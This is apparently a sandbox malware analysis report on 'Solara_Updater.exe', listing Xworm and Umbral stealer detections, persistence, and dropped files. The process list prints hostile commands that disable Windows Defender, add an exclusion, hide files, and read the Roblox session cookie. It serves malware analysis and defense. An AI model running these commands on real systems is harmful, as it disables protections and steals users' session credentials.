Analysis Overview
SHA256
4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf
Threat Level: Known bad
The file Solara_Updater.exe was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Modifies WinLogon for persistence
Umbral
Detect Umbral payload
Process spawned unexpected child process
Xworm
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Reads user/profile data of web browsers
Drops startup file
Looks up external IP address via web service
Adds Run key to start application
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Views/modifies file attributes
Runs ping.exe
Modifies registry class
Detects videocard installed
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies system certificate store
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-19 16:14
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-19 16:14
Reported
2024-05-19 16:17
Platform
win7-20240508-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\", \"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\", \"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
Umbral
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RustCheat.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RustCheat.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RustCheat.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RustCheat.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RustCheat.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\hostNet\\wscript.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\hostNet\\wscript.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | \??\c:\Windows\System32\CSC362901114F874F39A37D2928E62229.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | \??\c:\Windows\System32\hccjfr.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Common Files\Services\wscript.exe | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Services\817c8c8ec737a7 | C:\hostNet\bridgeblockportComBroker.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\L2Schemas\WmiPrvSE.exe | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| File opened for modification | C:\Windows\L2Schemas\WmiPrvSE.exe | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| File created | C:\Windows\L2Schemas\24dbde2999530e | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| File created | C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| File created | C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\69ddcba757bf72 | C:\hostNet\bridgeblockportComBroker.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\hostNet\bridgeblockportComBroker.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Loader.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RustCheat.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Loader.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\system32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
